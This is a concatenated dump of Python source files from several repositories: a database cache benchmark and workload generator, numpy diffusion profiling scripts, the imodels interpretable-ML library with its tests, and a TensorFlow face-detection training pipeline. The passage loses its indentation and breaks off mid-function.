for query_str in query_list:
self.db_cursor.execute(query_str)
self.db_conn.commit()
except psycopg2.DatabaseError as e:
print('PostgreSQL write transaction execution error')
self.db_conn.rollback()
else: # HBase write transaction
try:
with self.table.batch(transaction=True) as bat:
for (key_str, qual_val_dict) in zip(key_str_list, query_list):
bat.put(key_str.encode('utf-8'), qual_val_dict)
# TODO: check error handling here
except ValueError:
print('HBase value error.')
pass
tmp_write_end_time = time.time()
return tmp_write_end_time - tmp_write_start_time
def cleanup(self):
"""Close connection after testing."""
self.db_conn.close()
self.cache_client.flush_all()
self.cache_client.close()
```
#### File: cc_cache/utils/PointWrt_ds_generator.py
```python
import yaml
import argparse
import numpy as np
from numpy.random import default_rng
import random
import math
import pickle
import pdb
import scipy.stats as stats
from os.path import dirname
from os.path import abspath
from pathlib import Path
def genr_item_univ(config: dict, size_res_path='data/item_size.pkl', cls_res_path='data/cls_item.pkl'):
"""Generate universe of items (queries).
Generate and save result as <Item Size Table>. Item number and size range
specified by params in config. Compute and save <Class Item Table> based on
<Item Size Table> result.
Args:
config: dict, params parsed from input_params.yaml file
size_res_path: str, file path to save <Item Size Table> dict
cls_res_path: str, file path to save <Class Item Table> dict
Returns:
a dict mapping item id to item size,
another dict mapping class id to class vector (binary/boolean)
showing which items are in each class.
Raises:
ValueError: Undefined item distribution.
"""
item_size_dict = {}
# cls_num = config['item_cls_num']
item_num = config['item_num']
item_min_size = config['item_min_size'] # s0, minimum item size
item_max_size = config['item_max_size'] # s1, maximum item size
if config['item_distr'] == 'cls_norm':
# assert item_num % cls_num == 0 # each class contains same number of items
print('Generating item universe in cls_norm distribution.')
mu = (item_min_size + item_max_size) / 2 # adopt mean value of minimum and maximum size as mu
sigma = (mu - item_min_size) / 4 # adopt 4 std, guarantee 99.99% size greater than item_min_size and smaller than item_max_size
# random numbers satisfying normal distribution
rng = stats.truncnorm(
(item_min_size - mu) / sigma, (item_max_size - mu) / sigma, loc=mu, scale=sigma)
item_size_arr = np.around(rng.rvs(item_num), 0)
np.random.shuffle(item_size_arr)
for j in range(item_num):
item_size_dict[j] = item_size_arr[j]
elif config['item_distr'] == 'cls_random':
rng = default_rng(216) # set random seed
item_size_arr = rng.integers(low=item_min_size, high=item_max_size + 1, size=item_num)
np.random.shuffle(item_size_arr)
for j in range(item_num):
item_size_dict[j] = item_size_arr[j]
elif config['item_distr'] == 'uni_size':
assert item_min_size == item_max_size
for j in range(item_num):
item_size_dict[j] = item_min_size
else:
raise ValueError('Undefined item distribution.')
print('Item Size Dict: \n {}'.format(item_size_dict))
# generate cls_item
cls_item_fp = open(size_res_path, 'wb')
pickle.dump(item_size_dict, cls_item_fp)
cls_item_fp.close()
# compute cls_item_dict based on item_size_dict
cls_item_dict = {}
if config['item_distr'] == 'uni_size':
cls_num = 1
else:
cls_num = math.ceil(math.log2(item_max_size / item_min_size))
for cls_id in range(cls_num):
cls_item_dict[cls_id] = np.zeros(item_num, dtype=bool)
# check each item size and update class binary vector
for item_id in range(item_num):
item_cls = math.floor(math.log2(item_size_dict[item_id] / item_min_size))
cls_item_dict[item_cls][item_id] = 1
# dump <Class Item Table> using pickle
cls_item_fp = open(cls_res_path, 'wb')
pickle.dump(cls_item_dict, cls_item_fp)
cls_item_fp.close()
return item_size_dict, cls_item_dict
def genr_txn_seq(config: dict, txn_item_path='data/txn_item.pkl', id_seq_path='data/id_seq.npy', flag_seq_path='data/flag_seq.npy'):
"""Generate transaction sequence for point-write workload.
"""
# generate read-write flag based on write frequency
seq_len = config['seq_len'] # transaction sequence length
write_freq = config['write_freq'] # expected write transaction frequency
rng = default_rng(522)
flag_arr = rng.random(seq_len)
write_flag_seq = flag_arr < write_freq
np.save(flag_seq_path, write_flag_seq) # save to numpy file
# create read / write transactions based on recent read / write queries
item_num = config['item_num']
recent_read_thresh, recent_write_thresh = config['recent_read_thresh'], config['recent_write_thresh']
read_txn_size, write_txn_size = config['read_txn_size'], config['write_txn_size']
txn_vec_set = set() # store frozenset representing unique transactions
unique_txn_cnt = 0 # unique transaction count, serve as transaction id during generation
txn_item_dict = {} # map transaction id to transaction item vector
txn_id_seq = np.zeros(seq_len, dtype=int) # transaction id sequence
for i in range(seq_len):
# generate write transaction
if write_flag_seq[i]:
# check if there are enought 'recent read transactions' to select write queries
past_reads = np.where(write_flag_seq[0:i+1] == 0)[0]
if past_reads.shape[0] >= recent_read_thresh:
recent_reads = past_reads[-recent_read_thresh:past_reads.shape[0]]# find recent read queries
recent_read_id = txn_id_seq[recent_reads]
recent_read_queries = np.zeros(item_num, dtype=bool)
for txn_id in recent_read_id:
recent_read_queries = np.logical_or(recent_read_queries, txn_item_dict[txn_id])
non_recent_read_queries = np.logical_not(recent_read_queries)
# choose 1 query from non-recent read queries, another from recent read queries
if write_txn_size == 2:
recent_num, non_recent_num = 1, 1
else:
# TODO: fix this 50/50 setup
recent_num, non_recent_num = math.ceil(write_txn_size * 0.5), math.floor(write_txn_size * 0.5)
recent_samples = rng.choice(np.where(recent_read_queries == 1)[0], recent_num)
non_recent_samples = rng.choice(np.where(non_recent_read_queries == 1)[0], non_recent_num)
samples = np.concatenate((recent_samples, non_recent_samples))
tmp_txn_vec = np.zeros(item_num, dtype=bool)
for item_id in samples:
tmp_txn_vec[item_id] = 1
tmp_item_set = frozenset(samples)
if tmp_item_set not in txn_vec_set:
txn_vec_set.add(tmp_item_set)
tmp_txn_id = unique_txn_cnt
txn_id_seq[i] = tmp_txn_id
txn_item_dict[tmp_txn_id] = tmp_txn_vec
unique_txn_cnt += 1
else:
for txn_id in txn_item_dict:
if np.equal(tmp_txn_vec, txn_item_dict[txn_id]).all():
txn_id_seq[i] = txn_id
break
# not enough recent read transactions, choose write queries randomly
else:
samples = rng.choice(item_num, write_txn_size) # choose queries by random
tmp_txn_vec = np.zeros(item_num, dtype=bool)
for item_id in samples:
tmp_txn_vec[item_id] = 1
tmp_item_set = frozenset(samples)
if tmp_item_set not in txn_vec_set:
txn_vec_set.add(tmp_item_set)
tmp_txn_id = unique_txn_cnt
txn_id_seq[i] = tmp_txn_id
txn_item_dict[tmp_txn_id] = tmp_txn_vec
unique_txn_cnt += 1
else:
for txn_id in txn_item_dict:
if np.equal(tmp_txn_vec, txn_item_dict[txn_id]).all():
txn_id_seq[i] = txn_id
break
# generate read transaction
else:
past_writes = np.where(write_flag_seq[0:i+1] == 1)[0]
if past_writes.shape[0] >= recent_write_thresh:
recent_writes = past_writes[-recent_write_thresh:past_writes.shape[0]]# find recent write queries
recent_write_id = txn_id_seq[recent_writes]
recent_write_queries = np.zeros(item_num, dtype=bool)
for txn_id in recent_write_id:
recent_write_queries = np.logical_or(recent_write_queries, txn_item_dict[txn_id])
non_recent_write_queries = np.logical_not(recent_write_queries)
# choose 2 queries from non_recent_write, others from recent_write
recent_num, non_recent_num = read_txn_size - 2, 2
recent_samples = rng.choice(np.where(recent_write_queries == 1)[0], recent_num)
non_recent_samples = rng.choice(np.where(non_recent_write_queries == 1)[0], non_recent_num)
samples = np.concatenate((recent_samples, non_recent_samples))
tmp_txn_vec = np.zeros(item_num, dtype=bool)
for item_id in samples:
tmp_txn_vec[item_id] = 1
tmp_item_set = frozenset(samples)
if tmp_item_set not in txn_vec_set:
txn_vec_set.add(tmp_item_set)
tmp_txn_id = unique_txn_cnt
txn_id_seq[i] = tmp_txn_id
txn_item_dict[tmp_txn_id] = tmp_txn_vec
unique_txn_cnt += 1
else:
for txn_id in txn_item_dict:
if np.equal(tmp_txn_vec, txn_item_dict[txn_id]).all():
txn_id_seq[i] = txn_id
break
# not enough recent write transactions, choose read queries randomly
else:
samples = rng.choice(item_num, read_txn_size) # choose queries by random
tmp_txn_vec = np.zeros(item_num, dtype=bool)
for item_id in samples:
tmp_txn_vec[item_id] = 1
tmp_item_set = frozenset(samples)
if tmp_item_set not in txn_vec_set:
txn_vec_set.add(tmp_item_set)
tmp_txn_id = unique_txn_cnt
txn_id_seq[i] = tmp_txn_id
txn_item_dict[tmp_txn_id] = tmp_txn_vec
unique_txn_cnt += 1
else:
for txn_id in txn_item_dict:
if np.equal(tmp_txn_vec, txn_item_dict[txn_id]).all():
txn_id_seq[i] = txn_id
break
# save results to file
txn_item_fp = open(txn_item_path, 'wb')
pickle.dump(txn_item_dict, txn_item_fp)
txn_item_fp.close()
np.save(id_seq_path, txn_id_seq)
np.save(flag_seq_path, write_flag_seq)
return txn_item_dict, txn_id_seq, write_flag_seq
if __name__ == '__main__':
path = abspath(dirname(dirname(__file__)))+'/config/PointWrt.yaml'
config_file = open(path, 'r')
config_dict = yaml.load(config_file, Loader=yaml.FullLoader)
workload_dir = abspath(dirname(dirname(__file__))) + '/data/PointWrt/' + 'QueryNum{}_Unisize_RThresh{}_WThresh{}_RSize{}_WSize{}_Wrt{}_Len{}'.format(config_dict['item_num'], config_dict['recent_read_thresh'], config_dict['recent_write_thresh'], config_dict['read_txn_size'], config_dict['write_txn_size'], config_dict['write_freq'], config_dict['seq_len'])
Path(workload_dir).mkdir(parents=True, exist_ok=True)
item_size_dict, cls_item_dict = genr_item_univ(config_dict, size_res_path=workload_dir+'/item_size.pkl', cls_res_path=workload_dir+'/cls_item.pkl')
txn_item_dict, txn_id_seq, write_flag_seq = genr_txn_seq(config_dict, txn_item_path=workload_dir+'/txn_item.pkl', id_seq_path=workload_dir+'/id_seq.npy', flag_seq_path=workload_dir+'/flag_seq.npy')
``` |
{
"source": "jiayoustone/high_performance_python",
"score": 3
} |
#### File: 06_matrix/diffusion_1d/diffusion_numpy_memory.py
```python
import numpy as np
import time
grid_size = (512,)
@profile
def laplacian(grid, out):
np.copyto(out, grid)
np.multiply(out, -2.0, out)
np.add(out, np.roll(grid, +1), out)
np.add(out, np.roll(grid, -1), out)
@profile
def evolve(grid, dt, out, D=1):
laplacian(grid, out)
np.multiply(out, D * dt, out)
np.add(out, grid, out)
def run_experiment(num_iterations):
scratch = np.zeros(grid_size)
grid = np.zeros(grid_size)
block_low = int(grid_size[0] * .4)
block_high = int(grid_size[0] * .5)
grid[block_low:block_high] = 0.005
start = time.time()
for i in range(num_iterations):
evolve(grid, 0.1, scratch)
grid, scratch = scratch, grid
return time.time() - start
if __name__ == "__main__":
run_experiment(500)
```
#### File: jiayoustone/high_performance_python/nrange.py
```python
def nrange(start, stop, step=1):
while start < stop:
yield start
start += step
@profile
def ncall():
for i in nrange(1,1000000):
pass
if __name__ == "__main__":
ncall()
``` |
{
"source": "jiayouwyhit/imodels",
"score": 3
} |
#### File: imodels/algebraic/slim.py
```python
import cvxpy as cp # package for optimization
import numpy as np
from sklearn.base import BaseEstimator
from sklearn.linear_model import LinearRegression, Lasso
class SLIMRegressor(BaseEstimator):
'''Sparse integer linear model
'''
def __init__(self):
self.model = LinearRegression()
self.predict = self.model.predict
def fit(self, X, y, lambda_reg=10, sample_weight=None):
'''fit a linear model with integer coefficient and L1 regularization.
In case the optimization fails, fit lasso and round coefs.
Params
------
sample_weight: np.ndarray (n,)
weight for each individual sample
'''
if 'pandas' in str(type(X)):
X = X.values
if 'pandas' in str(type(y)):
y = y.values
assert type(X) == np.ndarray, 'inputs should be ndarrays'
assert type(y) == np.ndarray, 'inputs should be ndarrays'
# declare the integer-valued optimization variable
w = cp.Variable(X.shape[1], integer=True)
# set up the minimization problem
residuals = X @ w - y
if sample_weight is not None:
# print('shapes', residuals.shape, sample_weight.shape)
residuals = cp.multiply(sample_weight, residuals)
try:
mse = cp.sum_squares(residuals)
l1_penalty = lambda_reg * cp.norm(w, 1)
obj = cp.Minimize(mse + l1_penalty)
prob = cp.Problem(obj)
# solve the problem using an appropriate solver
prob.solve()
self.model.coef_ = w.value.astype(np.int)
self.model.intercept_ = 0
except:
m = Lasso(alpha=lambda_reg)
m.fit(X, y, sample_weight=sample_weight)
self.model.coef_ = np.round(m.coef_).astype(np.int)
self.model.intercept_ = m.intercept_
def predict_proba(self, X):
preds = self.predict(X)
preds_proba = np.array([1 / (1 + np.exp(-y)) for y in preds])
return np.vstack((1 - preds_proba, preds_proba)).transpose()
```
#### File: imodels/util/score.py
```python
from typing import List, Tuple
from warnings import warn
import pandas as pd
import numpy as np
from sklearn.utils import indices_to_mask
from sklearn.linear_model import Lasso, LogisticRegression
from sklearn.linear_model._coordinate_descent import _alpha_grid
from sklearn.model_selection import KFold
from imodels.util.rule import Rule
def score_precision_recall(X,
y,
rules: List[List[str]],
samples: List[List[int]],
features: List[List[int]],
feature_names: List[str],
oob: bool = True) -> List[Rule]:
scored_rules = []
for curr_rules, curr_samples, curr_features in zip(rules, samples, features):
# Create mask for OOB samples
mask = ~indices_to_mask(curr_samples, X.shape[0])
if sum(mask) == 0:
if oob:
warn(
"OOB evaluation not possible: doing it in-bag. Performance evaluation is likely to be wrong"
" (overfitting) and selected rules are likely to not perform well! Please use max_samples < 1."
)
mask = curr_samples
# XXX todo: idem without dataframe
X_oob = pd.DataFrame(
(X[mask, :])[:, curr_features],
columns=np.array(feature_names)[curr_features]
)
if X_oob.shape[1] <= 1: # otherwise pandas bug (cf. issue #16363)
return []
y_oob = y[mask]
y_oob = np.array((y_oob != 0))
# Add OOB performances to rules:
scored_rules += [
Rule(r, args=_eval_rule_perf(r, X_oob, y_oob))
for r in set(curr_rules)
]
return scored_rules
def _eval_rule_perf(rule: str, X, y) -> Tuple[float, float]:
detected_index = list(X.query(rule).index)
if len(detected_index) <= 1:
return (0, 0)
y_detected = y[detected_index]
true_pos = y_detected[y_detected > 0].sum()
if true_pos == 0:
return (0, 0)
pos = y[y > 0].sum()
return y_detected.mean(), float(true_pos) / pos
def score_lasso(X, y, rules: List[str], alphas=None, cv=3,
prediction_task='regression',
max_rules=2000, random_state=None) -> Tuple[List[Rule], List[float], float]:
if alphas is None:
if prediction_task == 'regression':
alphas = _alpha_grid(X, y)
elif prediction_task == 'classification':
alphas = [1 / alpha
for alpha in np.logspace(-4, 4, num=10, base=10)]
coef_zero_threshold = 1e-6 / np.mean(np.abs(y))
mse_cv_scores = []
nonzero_rule_coefs_count = []
kf = KFold(cv)
# alphas are sorted from most reg. to least reg.
for alpha in alphas:
if prediction_task == 'regression':
m = Lasso(alpha=alpha, random_state=random_state)
else:
m = LogisticRegression(penalty='l1', C=1/alpha, solver='liblinear')
mse_cv = 0
for train_index, test_index in kf.split(X):
X_train, X_test = X[train_index], X[test_index]
y_train, y_test = y[train_index], y[test_index]
m.fit(X_train, y_train)
mse_cv += np.mean((m.predict(X_test) - y_test) ** 2)
m.fit(X, y)
rule_count = np.sum(np.abs(m.coef_.flatten()) > coef_zero_threshold)
if rule_count > max_rules:
break
nonzero_rule_coefs_count.append(rule_count)
mse_cv_scores.append(mse_cv / cv)
best_alpha = alphas[np.argmin(mse_cv_scores)]
if prediction_task == 'regression':
lscv = Lasso(alpha=best_alpha, random_state=random_state, max_iter=2000)
else:
lscv = LogisticRegression(penalty='l1', C=1/best_alpha, solver='liblinear',
random_state=random_state, max_iter=200)
lscv.fit(X, y)
coef_ = lscv.coef_.flatten()
coefs = list(coef_[:-len(rules)])
support = np.sum(X[:, -len(rules):], axis=0) / X.shape[0]
nonzero_rules = []
for r, w, s in zip(rules, coef_[-len(rules):], support):
if abs(w) > coef_zero_threshold:
nonzero_rules.append(Rule(r, args=[w], support=s))
coefs.append(w)
return nonzero_rules, coefs, lscv.intercept_
```
#### File: imodels/tests/brl_test.py
```python
import unittest
from urllib.request import urlretrieve
import numpy as np
from scipy.io.arff import loadarff
from sklearn.model_selection import train_test_split
from imodels.rule_list.bayesian_rule_list.bayesian_rule_list import BayesianRuleListClassifier
import os
path_to_tests = os.path.dirname(os.path.realpath(__file__))
class TestBRL(unittest.TestCase):
def test_integration_stability(self):
'''Test on synthetic dataset
'''
X = [[0, 0, 1, 1, 0],
[1, 0, 0, 0, 0],
[0, 0, 1, 0, 0],
[1, 0, 0, 0, 0],
[1, 1, 0, 1, 1],
[1, 1, 1, 1, 1],
[0, 1, 1, 1, 1],
[1, 0, 1, 1, 1]]
y = [0, 0, 0, 0, 1, 1, 1, 1]
M = BayesianRuleListClassifier(minsupport=0.02)
feat = ['ft1', 'ft2', 'ft3', 'ft4', 'ft5']
M.fit(X, y, feature_labels=feat)
assert [M.predict([row], threshold=0.5) for row in X] == y
def test_integration_fitting(self):
'''Test on a real (small) dataset
'''
np.random.seed(13)
feature_labels = ["#Pregnant", "Glucose concentration test", "Blood pressure(mmHg)",
"Triceps skin fold thickness(mm)",
"2-Hour serum insulin (mu U/ml)", "Body mass index", "Diabetes pedigree function",
"Age (years)"]
data = loadarff(os.path.join(path_to_tests, "test_data/diabetes.arff"))
data_np = np.array(list(map(lambda x: np.array(list(x)), data[0])))
X, y_text = data_np[:, :-1].astype('float32'), data_np[:, -1].astype('str')
y = (y_text == 'tested_positive').astype(np.int) # labels 0-1
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.75) # split
# train classifier (allow more iterations for better accuracy; use BigDataRuleListClassifier for large datasets)
print('training...')
model = BayesianRuleListClassifier(max_iter=1000, listlengthprior=5, class1label="diabetes", verbose=False)
model.fit(X_train, y_train, feature_labels=feature_labels)
preds = model.predict(X_test, threshold=0.1)
print("RuleListClassifier Accuracy:", np.mean(y_test == preds), "Learned interpretable model:\n", model)
```
#### File: tests/notebooks/imodels_comparisons.py
```python
import pickle as pkl
import pandas as pd
import imodels
import itertools
import os
from imodels.util.evaluate.compare_models import run_comparison
from sklearn.metrics import accuracy_score, f1_score
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
import matplotlib.pyplot as plt
from tqdm import tqdm
# %load_ext autoreload
# %autoreload 2
# change working directory to project root
if os.getcwd().split('/')[-1] != 'imodels':
os.chdir('..')
MODEL_COMPARISON_PATH = 'tests/test_data/comparison_data/'
MODEL_COMPARISON_FILE = MODEL_COMPARISON_PATH + 'model_comparisons.pkl'
# %% [markdown]
# # compare static performance of different models
# %%
df = pkl.load(open(MODEL_COMPARISON_FILE, 'rb'))['df'].round(3)
print('columns', df.columns, 'models', df.index)
# %% [markdown]
# # complexity-vs-accuracy plots for each model
# %%
COMPARISON_DATASETS = [
("breast-cancer", 13),
("breast-w", 15),
("credit-g", 31),
("haberman", 43),
("heart", 1574),
("labor", 4),
("vote", 56),
]
METRICS = [
('Acc.', accuracy_score),
('Time', None),
('Complexity', None)
]
def get_comparison_df(estimators):
'''Get results for running multiple estimators
'''
estimator_name = estimators[0][0]
model_comparison_file = MODEL_COMPARISON_PATH + f'{estimator_name}_comparisons.pkl'
if os.path.isfile(model_comparison_file):
result = pkl.load(open(model_comparison_file, 'rb'))['df']
else:
result = run_comparison(COMPARISON_DATASETS, METRICS, estimators, write=False, average=True, verbose=False)
pkl.dump({'df': result}, open(model_comparison_file, 'wb'))
return result
def viz_model(result):
'''Plot acc vs complexity
'''
complexities = result[result.index.str.contains('Complexity')]
accuracies = result[result.index.str.contains('Acc')]
complexity_sort_indices = complexities.argsort()
plt.plot(complexities[complexity_sort_indices], accuracies[complexity_sort_indices])
plt.xlabel('Complexity score')
plt.ylabel('Average accuracy across comparison datasets')
# %% [markdown]
# ## Random Forest
# %%
est_rf = [
('random_forest', RandomForestClassifier(n_estimators=n, max_depth=d))
for n, d in itertools.product([2, 3, 4], [2, 3])
]
est_gb = [
('gradient_boosting', GradientBoostingClassifier(n_estimators=n, max_depth=d))
for n, d in itertools.product([2, 3, 4], [2, 3])
]
est_skope = [
('skope', imodels.SkopeRulesClassifier(n_estimators=n, max_depth=d))
for n, d in itertools.product([2, 4, 8, 16, 32, 64, 96], [2, 3])
]
est_rulefit = [
('rulefit', imodels.RuleFitClassifier(max_rules=n, tree_size=d))
for n, d in itertools.product([2, 4, 8, 16, 32, 48], [4, 8])
]
est_fplasso = [
('fplasso', imodels.FPLassoClassifier(max_rules=n, maxcardinality=c))
for n, c in itertools.product([2, 4, 8, 16, 32, 48, 96], [2, 3])
]
est_fpskope = [
('fpskope', imodels.FPSkopeClassifier(maxcardinality=c, max_depth_duplication=dd))
for c, dd in itertools.product([2, 3, 4], [1, 2, 3])
]
est_brl = [
('brl', imodels.BayesianRuleListClassifier(listlengthprior=l, maxcardinality=c))
for l, c in itertools.product([2, 4, 8, 16], [2, 3])
]
est_grl = [('grl', imodels.GreedyRuleListClassifier(max_depth=d)) for d in [2, 4, 8, 16]]
est_oner = [('oner', imodels.OneRClassifier(max_depth=d)) for d in [2, 3, 4, 5, 6, 7]]
est_brs = [('brs', imodels.BoostedRulesClassifier(n_estimators=n)) for n in [2, 4, 8, 16, 32]]
ests = [est_rf, est_gb, est_skope, est_rulefit, est_fplasso, est_fpskope, est_brl, est_grl, est_oner, est_brs]
plt.figure(dpi=250)
for est in tqdm(ests):
result = get_comparison_df(est)
complexities = result[result.index.str.contains('Complexity')]
accuracies = result[result.index.str.contains('Acc')]
complexity_sort_indices = complexities.argsort()
plt.plot(complexities[complexity_sort_indices],
accuracies[complexity_sort_indices], label=est[0][0].replace('_', ' '))
plt.xlabel('Complexity score')
plt.ylabel('Average accuracy across comparison datasets')
plt.legend(frameon=False, handlelength=1)
plt.show()
``` |
{
"source": "Jiayuan-Gu/face-project",
"score": 2
} |
#### File: Detection/code/data_test.py
```python
import os
import sys
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import scipy.io as sio
import time
import logging
# import resfcn_input
# import resfcn_config as config
def main(argv=None): # pylint: disable=unused-argument
# images,labels,pos_ws,neg_ws,scan_names,z_indexs = resfcn_input.inputs()
# print('inputs initialize.')
data_dir = '/data-disk/gujy/Face/WF/tf_records'
recordName = os.listdir(data_dir)[int(argv[0])]
logFile = os.path.join('%s.log'%recordName)
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
datefmt='%m-%d-%H:%M:%S',
filename=logFile,
filemode='w')
reader = tf.TFRecordReader()
_,serialized_example = reader.read(tf.train.string_input_producer([os.path.join(data_dir,recordName)]))
features = tf.parse_single_example(serialized_example,
features={
'image': tf.VarLenFeature(dtype=tf.float32),
'image_shape':tf.FixedLenFeature(shape=[3],dtype=tf.int64),
'label': tf.VarLenFeature(dtype=tf.float32),
'label_shape':tf.FixedLenFeature(shape=[3],dtype=tf.int64),
'name': tf.FixedLenFeature(shape=[],dtype=tf.string)
})
image = tf.cast(features['image'],tf.float32)
image_shape = tf.cast(features['image_shape'],tf.int32)
image = tf.sparse_tensor_to_dense(image)
image = tf.reshape(image,image_shape)
label = tf.cast(features['label'],tf.float32)
label_shape = tf.cast(features['label_shape'],tf.int32)
label = tf.sparse_tensor_to_dense(label)
label = tf.reshape(label,label_shape)
name = tf.cast(features['name'],tf.string)
sess = tf.Session(config=tf.ConfigProto(log_device_placement=False,gpu_options=tf.GPUOptions(allow_growth=True)))
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess,coord=coord)
for i in range(1000):
try:
# for i in range(100):
# sess_output = sess.run([images,labels,pos_ws,neg_ws,scan_names,z_indexs])
# #sess_output = sess.run([image,label,pos_w,neg_w,scan_name,z_index,image_shape,label_shape])
# #sess_output[0]=np.reshape(sess_output[0],sess_output[-2])
# #sess_output[1]=np.reshape(sess_output[1],sess_output[-1])
# plt.subplot(121)
# plt.imshow(sess_output[0][0,:,:,int(config.IMAGE_SIZE[-1]/2)])
# plt.subplot(122)
# plt.imshow(sess_output[1][0,:,:,int(config.LABEL_SIZE[-1]/2)])
# plt.show()
# print(sess_output[2])
# print(sess_output[3])
IMAGE,LABEL,NAME = sess.run([image,label,name])
print(NAME.decode())
except:
logging.error('%d'%i)
break
finally:
coord.request_stop()
coord.join(threads)
sess.close()
if __name__ == '__main__':
os.environ['CUDA_VISIBLE_DEVICES'] = '4'
main(sys.argv[1:])
# img = 5*np.random.randn(5,5)+5;
# print(img)
# image = tf.constant(img)
# a = tf.clip_by_value(image,4,6)
# b = tf.image.adjust_brightness(a,-4)
# print('Begin.')
# os.environ['CUDA_VISIBLE_DEVICES'] = '0'
# init = tf.initialize_all_variables()
# sess = tf.Session(config=tf.ConfigProto(log_device_placement=False))
# sess.run(init)
# print(sess.run([a,b]))
```
#### File: Detection/code/resfcn_config.py
```python
import os
import shutil
import logging
from datetime import datetime
import tensorflow as tf
version = 'v0.1.0.20170110'
run = '1_0'
time_stamp = datetime.now().strftime('%Y-%m-%d_%H_%M')
is_training = True
# tf config
gpu_device = '5'
session_config = tf.ConfigProto(log_device_placement=False,gpu_options=tf.GPUOptions(allow_growth=True))
# resfcn_train
data_dir = '/data-disk/gujy/Face/WF/tf_records'
train_dir = os.path.join('/data-disk/gujy/Face/train',version,run)
resume = True
restore_path = '/data-disk/gujy/Face/train/v0.0.0.20161217/adam/3_0/checkpoint/model.ckpt-43000'
# restore_path = None
max_steps = 1e6
num_steps_debug = 20
num_steps_summary = 100
num_steps_checkpoint = 250
# resfcn_model
CONV_STDDEV = None
BIAS_STDDEV = 0.0
DECONV_STDDEV = None
## Weight decay
CONV_WD = 1e-8
BIAS_WD = None
DECONV_WD = 1e-8
# training setting
learning_rate = 1e-4
# optimizer = tf.train.GradientDescentOptimizer
optimizer = tf.train.AdamOptimizer
# resfcn_input
IMAGE_SIZE = [512,512,3]
LABEL_SIZE = [512,512,1]
CROP_SIZE = [512,512,4]
neg_add_w = 0.1
input_threads = 4
batch_size = 4
tfrecords = [os.path.join(data_dir,tfrecord) for tfrecord in os.listdir(data_dir)]
num_examples_per_epoch = 12880-362
num_batches_per_epoch = int(num_examples_per_epoch/batch_size)
# whether to new a folder
if not os.path.isdir(train_dir):
os.makedirs(os.path.join(train_dir,'fig'))
os.makedirs(os.path.join(train_dir,'checkpoint'))
os.makedirs(os.path.join(train_dir,'summary'))
os.makedirs(os.path.join(train_dir,'log'))
shutil.copy('resfcn_config.py',os.path.join(train_dir,'log','%s.config'%time_stamp))
shutil.copy('resfcn_model.py',os.path.join(train_dir,'log','%s.model'%time_stamp))
log_file = os.path.join(train_dir,'log','%s.log'%time_stamp)
# logger config
logger = logging.getLogger('mylog')
logger.propagate = False
logger.setLevel(logging.DEBUG)
fmt = logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s')
fileHandler = logging.FileHandler(log_file)
fileHandler.setLevel(logging.DEBUG)
fileHandler.setFormatter(fmt)
consoleHandler = logging.StreamHandler()
consoleHandler.setLevel(logging.INFO)
consoleHandler.setFormatter(fmt)
logger.addHandler(fileHandler)
logger.addHandler(consoleHandler)
def close_all():
fileHandler.close()
consoleHandler.close()
```
#### File: Detection/code/resfcn_train.py
```python
from datetime import datetime
import time
import os.path
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import resfcn_config as config
from resfcn_config import logger
import resfcn_model as resfcn
import resfcn_input
def train():
global_step = tf.Variable(0, trainable=False)
learning_rate = tf.constant(config.learning_rate)
# Get images and labels for FCN.
images,labels,pos_ws,neg_ws,names = resfcn_input.inputs()
print('inputs initialize.')
# Build a Graph that computes the score map predictions from the
# inference model.
preds = resfcn.inference(images)
# tf.image_summary('preds',preds[:,:,:,int(config.LABEL_SIZE[-1]/2)],max_images=int(config.batch_size/2))
print('inference initialize.')
# Calculate loss.
loss, pos_loss, neg_loss = resfcn.loss(preds, labels, pos_ws, neg_ws)
print('loss initialize.')
# Build a Graph that trains the model with one batch of examples and
# updates the model parameters.
train_op = resfcn.train(loss, global_step,learning_rate,optimizer=config.optimizer)
print('train initialize.')
# Create a saver.
saver = tf.train.Saver(tf.all_variables(),max_to_keep=100,name='saver')
print('saver initialize.')
# Build the summary op
summary_loss_op = tf.merge_all_summaries(key='LOSS_OP')
summary_param_op = tf.merge_all_summaries(key='PARAM_OP')
# Build an initialization operation to run below.
init = tf.initialize_all_variables()
# Start running operations on the Graph.
sess = tf.Session(config=config.session_config)
sess.run(init)
print('session initialize.')
if config.resume:
if not config.restore_path:
restore_path = tf.train.latest_checkpoint(os.path.join(config.train_dir,'checkpoint'))
if not restore_path:
print('no checkpoint to continue.')
sys.exit(1)
saver.restore(sess,restore_path)
logger.info('continue from %s',restore_path)
else:
saver.restore(sess,config.restore_path)
logger.info('global step is set to %d',sess.run(tf.assign(global_step,0)))
logger.info('learning rate is set to %.3f',sess.run(learning_rate))
logger.info('restart from %s',config.restore_path)
optimizer_scope = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES,"scope/prefix/for/optimizer")
sess.run(tf.initialize_variables(optimizer_scope))
summary_writer = tf.train.SummaryWriter(os.path.join(config.train_dir,'summary'),sess.graph)
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess,coord=coord)
print('training begins.')
step = sess.run(global_step)
try:
while step<config.max_steps:
sess_input = [train_op,loss]
if step%config.num_steps_debug==0:
sess_input.append(preds)
sess_input.append(images)
sess_input.append(labels)
sess_input.append(names)
sess_input.append(pos_loss)
sess_input.append(neg_loss)
sess_input.append(summary_loss_op)
if step%config.num_steps_summary==0:
sess_input.append(summary_param_op)
start_time = time.time()
sess_output = sess.run(sess_input)
duration = time.time() - start_time
assert not np.isnan(sess_output[1]),'Model with loss = nan.'
num_examples_per_step = config.batch_size
examples_per_sec = num_examples_per_step / duration
sec_per_batch = float(duration)
format_str = ('%s: step %d, loss = %.8f (%.1f examples/sec; %.3f sec/batch)')
print (format_str % (datetime.now().strftime('%H:%M:%S'),
step, sess_output[1], examples_per_sec, sec_per_batch))
if step % config.num_steps_debug==0:
format_str = ('epoch %d, pos_loss = %.8f, neg_loss = %.8f')
print(format_str % (int(step/config.num_batches_per_epoch),
sess_output[6],sess_output[7]))
summary_writer.add_summary(sess_output[8],step)
ind = int(step%(2*config.num_steps_debug)==0)*int(config.batch_size/2)
plt.subplot(131)
plt.imshow(128-128*sess_output[3][ind,:,:,:])
plt.subplot(132)
